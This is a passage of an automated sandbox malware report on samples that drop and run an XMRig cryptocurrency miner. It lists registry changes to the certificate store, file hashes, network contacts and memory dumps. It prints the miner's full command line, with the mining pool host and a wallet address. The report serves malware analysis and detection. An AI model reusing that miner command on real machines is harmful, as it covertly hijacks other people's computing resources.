ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1964 wrote to memory of 3844 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1964 wrote to memory of 3844 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4948 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3864 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| GB | 142.250.187.234:443 | tcp | |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
| US | 13.107.246.64:443 | tcp | |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.65.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3844-16-0x00000154C0770000-0x00000154C0790000-memory.dmp
memory/3844-17-0x00000154C1EE0000-0x00000154C1F00000-memory.dmp
memory/3844-18-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-21-0x00000154C1F20000-0x00000154C1F40000-memory.dmp
memory/3844-20-0x00000154C1F00000-0x00000154C1F20000-memory.dmp
memory/3844-19-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-22-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-23-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-24-0x00000154C1F00000-0x00000154C1F20000-memory.dmp
memory/3844-25-0x00000154C1F20000-0x00000154C1F40000-memory.dmp
memory/3844-26-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-27-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-28-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-29-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-30-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-31-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-32-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-33-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-34-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-35-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-36-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-37-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-38-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-39-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-40-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-41-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-42-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-43-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-44-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-45-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-46-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-47-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-48-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-49-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-50-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-51-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-52-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-53-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-54-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-55-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-56-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-57-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-58-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-59-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-60-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-61-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-62-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-63-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-64-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-65-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-66-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-67-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-68-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-69-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-70-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-71-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-72-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-73-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-74-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-75-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-76-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-77-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-78-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-79-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-80-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-81-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-82-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-83-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
memory/3844-84-0x00007FF7AED80000-0x00007FF7AF883000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 18:28
Platform
win10v2004-20240426-en
Max time kernel
1794s
Max time network
1787s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2116 wrote to memory of 2776 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2116 wrote to memory of 2776 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.73.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2776-16-0x00000239CFA90000-0x00000239CFAB0000-memory.dmp
memory/2776-17-0x00000239CFCE0000-0x00000239CFD00000-memory.dmp
memory/2776-18-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-20-0x00000239D14C0000-0x00000239D14E0000-memory.dmp
memory/2776-19-0x00000239D14E0000-0x00000239D1500000-memory.dmp
memory/2776-21-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-22-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-25-0x00000239D14C0000-0x00000239D14E0000-memory.dmp
memory/2776-24-0x00000239D14E0000-0x00000239D1500000-memory.dmp
memory/2776-23-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-26-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-27-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-28-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-29-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-30-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-31-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-32-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-33-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-34-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-35-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-36-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-37-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-38-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-39-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-40-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-41-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-42-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-43-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-44-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-45-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-46-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-47-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-48-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
